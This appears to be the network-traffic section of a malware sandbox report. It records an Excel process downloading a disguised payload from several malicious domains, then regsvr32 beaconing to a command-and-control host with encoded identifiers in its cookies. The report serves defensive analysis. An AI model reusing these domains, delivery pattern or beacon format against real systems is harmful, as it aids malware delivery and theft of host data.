                                                                                                                                                                                              Jul 6, 2021 15:07:34.315385103 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.315490961 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.447580099 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.448457003 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.448478937 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449503899 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449518919 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449599028 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449611902 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.450508118 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.450639963 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.451268911 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.451859951 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.451881886 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452313900 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452528954 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452543020 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452609062 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.453598976 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.453613997 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.453722954 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.454617977 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.454632044 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.454854965 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.455626011 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.455641031 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.455791950 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.456650972 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.456662893 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.456851006 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487211943 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487229109 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487247944 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487426996 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487440109 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487462997 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487622976 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487664938 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488230944 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488253117 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488265991 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488809109 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489068031 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489083052 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489099979 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489372015 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489883900 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489905119 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489932060 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490704060 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490726948 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490739107 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490848064 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490875006 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490883112 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491532087 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491547108 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491564989 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491693974 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.492373943 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.492393017 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.497618914 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.656478882 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:34.694731951 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.697809935 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:34.698215961 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:34.737066031 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:35.427088022 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:35.427238941 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:35.429447889 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:36.480303049 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:36.480566025 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:09:24.138870001 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:09:24.139281034 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:09:24.139580011 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178111076 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178282976 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178539038 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178606033 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:09:24.180530071 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:09:24.180599928 CEST4916780192.168.2.22172.67.198.51

                                                                                                                                                                                              UDP Packets


                                                                                                                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 6, 2021 15:07:24.266448975 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | thousandsyears.download | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.506598949 CEST | 192.168.2.22 | 8.8.8.8 | 0xd8c3 | Standard query (0) | voopeople.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.792174101 CEST | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | uppercilio.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:25.753261089 CEST | 192.168.2.22 | 8.8.8.8 | 0x6848 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:25.852262974 CEST | 192.168.2.22 | 8.8.8.8 | 0x26ae | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:27.136984110 CEST | 192.168.2.22 | 8.8.8.8 | 0x4335 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:27.220160961 CEST | 192.168.2.22 | 8.8.8.8 | 0x63f2 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:29.116636038 CEST | 192.168.2.22 | 8.8.8.8 | 0x6e2b | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:29.194570065 CEST | 192.168.2.22 | 8.8.8.8 | 0xbb9f | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:31.052112103 CEST | 192.168.2.22 | 8.8.8.8 | 0x8ff4 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:31.115422010 CEST | 192.168.2.22 | 8.8.8.8 | 0x7a0a | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:33.312329054 CEST | 192.168.2.22 | 8.8.8.8 | 0x1363 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:33.381632090 CEST | 192.168.2.22 | 8.8.8.8 | 0x916a | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:34.521521091 CEST | 192.168.2.22 | 8.8.8.8 | 0xb77d | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:34.597621918 CEST | 192.168.2.22 | 8.8.8.8 | 0xbdab | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)

                                                                                                                                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 6, 2021 15:07:24.331594944 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | thousandsyears.download |  | 172.67.198.51 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.331594944 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | thousandsyears.download |  | 104.21.52.111 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.574628115 CEST | 8.8.8.8 | 192.168.2.22 | 0xd8c3 | No error (0) | voopeople.fun |  | 172.67.194.117 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.574628115 CEST | 8.8.8.8 | 192.168.2.22 | 0xd8c3 | No error (0) | voopeople.fun |  | 104.21.12.122 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.851367950 CEST | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | uppercilio.fun |  | 104.21.55.83 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:24.851367950 CEST | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | uppercilio.fun |  | 172.67.146.88 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:25.831001997 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:25.831001997 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:25.831001997 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:25.909544945 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:25.909544945 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:25.909544945 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:27.207706928 CEST | 8.8.8.8 | 192.168.2.22 | 0x4335 | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:27.207706928 CEST | 8.8.8.8 | 192.168.2.22 | 0x4335 | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:27.285522938 CEST | 8.8.8.8 | 192.168.2.22 | 0x63f2 | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:27.285522938 CEST | 8.8.8.8 | 192.168.2.22 | 0x63f2 | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:29.176505089 CEST | 8.8.8.8 | 192.168.2.22 | 0x6e2b | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:29.176505089 CEST | 8.8.8.8 | 192.168.2.22 | 0x6e2b | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:29.176505089 CEST | 8.8.8.8 | 192.168.2.22 | 0x6e2b | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:29.249245882 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb9f | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:29.249245882 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb9f | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:29.249245882 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb9f | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:31.106637001 CEST | 8.8.8.8 | 192.168.2.22 | 0x8ff4 | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:31.106637001 CEST | 8.8.8.8 | 192.168.2.22 | 0x8ff4 | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:31.161294937 CEST | 8.8.8.8 | 192.168.2.22 | 0x7a0a | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:31.161294937 CEST | 8.8.8.8 | 192.168.2.22 | 0x7a0a | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:33.366873026 CEST | 8.8.8.8 | 192.168.2.22 | 0x1363 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:33.366873026 CEST | 8.8.8.8 | 192.168.2.22 | 0x1363 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:33.366873026 CEST | 8.8.8.8 | 192.168.2.22 | 0x1363 | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:33.436418056 CEST | 8.8.8.8 | 192.168.2.22 | 0x916a | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:33.436418056 CEST | 8.8.8.8 | 192.168.2.22 | 0x916a | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 15:07:33.436418056 CEST | 8.8.8.8 | 192.168.2.22 | 0x916a | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:34.582590103 CEST | 8.8.8.8 | 192.168.2.22 | 0xb77d | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:34.582590103 CEST | 8.8.8.8 | 192.168.2.22 | 0xb77d | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:34.654891968 CEST | 8.8.8.8 | 192.168.2.22 | 0xbdab | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 15:07:34.654891968 CEST | 8.8.8.8 | 192.168.2.22 | 0xbdab | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • thousandsyears.download
                                                                                                                                                                                              • voopeople.fun
                                                                                                                                                                                              • uppercilio.fun
                                                                                                                                                                                              • astrocycle.download

                                                                                                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 172.67.198.51 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:07:24.390232086 CEST | 0 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: thousandsyears.download
                                                                                                                                                                                              Connection: Keep-Alive
Jul 6, 2021 15:07:24.450352907 CEST | 2 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:24 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 4274
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VmvIn%2Bt8%2B%2Ba%2BScS%2FFU7rDNbdB4WhaK8GW%2F4tLDa5Y6N6ikv7oKqorLg9y1o%2Bo%2Bk1gOD%2FvsRhWJxxpzT1vTrLYdrRIy3DXL3BZlXJM6eVgPsCSrit2ZzKB%2B7T3%2BL3Ywtv19W0rJU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e4d9f024e3d-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
1           192.168.2.22  49168        172.67.194.117   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Jul 6, 2021 15:07:24.621185064 CEST  62                  OUT        GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: voopeople.fun
    Connection: Keep-Alive
Jul 6, 2021 15:07:24.718043089 CEST  64                  IN         HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 13:07:24 GMT
    Content-Type: application/octet-stream
    Content-Length: 57856
    Connection: keep-alive
    Content-Disposition: attachment; filename=lsdfik.fml
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 4273
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=s%2B8FAtNhnjQzr1O8UP9iUO08DcT1KxsaDvc7eha2EOsf1s2GNo8RKQERM9jS3FZgVQ56Yn9dYcZukmUANQD1gRcSFb5LWxl8mpfkjQj5s7CRS2qvwxr%2BerTCPw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a90e4f1fd42c22-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
2           192.168.2.22  49169        104.21.55.83     80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Jul 6, 2021 15:07:24.897356033 CEST  125                 OUT        GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: uppercilio.fun
    Connection: Keep-Alive
Jul 6, 2021 15:07:24.997143984 CEST  126                 IN         HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 13:07:24 GMT
    Content-Type: application/octet-stream
    Content-Length: 57856
    Connection: keep-alive
    Content-Disposition: attachment; filename=lsdfik.fml
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 4272
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HxS6DVkhc1ZhRsctA4%2B4wRcXNfsXPSjIis2vJtDaAwWpiBqHwotxFztLYL%2B0PI3TPlFoVoVaXUfSfgm1bcUzX%2FeCFmdgedKItMbt9fWiw3XeisseZQAYXFiKEB4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a90e50ca8c2c2a-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID: 3; Source IP: 192.168.2.22; Source Port: 49171; Destination IP: 172.67.213.115; Destination Port: 80; Process: C:\Windows\System32\regsvr32.exe
Timestamp: Jul 6, 2021 15:07:27.325968027 CEST; kBytes transferred: 445; Direction: OUT; Data:
GET / HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cookie: __gads=3565085024:1:7080:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:31384337383432373833324243433531; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                              Host: astrocycle.download
Timestamp: Jul 6, 2021 15:07:27.874520063 CEST; kBytes transferred: 446; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:27 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GN9wYO%2BIuHVeDE2EWDQTg%2BEKZY5Nl%2Fwc0vzEgt9k98rnRs6rIHEnNd7r%2F6bXYCKHxUmoJyoC1IQCkvi71zSQPkur0%2F%2BM4ztJ8f9a4JHQ6lws%2Fs6%2B%2Br%2FebSEod2C%2FoFGRjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e5fff624a61-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Timestamp: Jul 6, 2021 15:07:27.874545097 CEST; kBytes transferred: 446; Direction: IN; Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4; Source IP: 192.168.2.22; Source Port: 49173; Destination IP: 172.67.213.115; Destination Port: 80; Process: C:\Windows\System32\regsvr32.exe
Timestamp: Jul 6, 2021 15:07:31.204788923 CEST; kBytes transferred: 704; Direction: OUT; Data:
GET / HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cookie: __gads=3565085024:1:7084:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:39463142354243374539333138353931; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                              Host: astrocycle.download
Timestamp: Jul 6, 2021 15:07:31.738668919 CEST; kBytes transferred: 705; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:31 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zqsoB%2BQBjUhEGt5%2B7tJWBRIv65nP%2B8RLY4VBWICRx6EGgR6gVlTKfKKTZ8Hxf%2FWleXeVdN%2F8hTAmbWk9MO6JBlUMkCM2lHs9Lci7Np0uqxGaBu%2FelEupxOBUbfJRkoMBsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e783ef2dffb-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Timestamp: Jul 6, 2021 15:07:31.738708973 CEST; kBytes transferred: 705; Direction: IN; Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5; Source IP: 192.168.2.22; Source Port: 49175; Destination IP: 104.21.37.209; Destination Port: 80; Process: C:\Windows\System32\regsvr32.exe
Timestamp: Jul 6, 2021 15:07:34.698215961 CEST; kBytes transferred: 964; Direction: OUT; Data:
GET / HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cookie: __gads=3565085024:1:7088:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:37454443394536333630373541353235; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                              Host: astrocycle.download
Timestamp: Jul 6, 2021 15:07:35.427088022 CEST; kBytes transferred: 965; Direction: IN; Data:
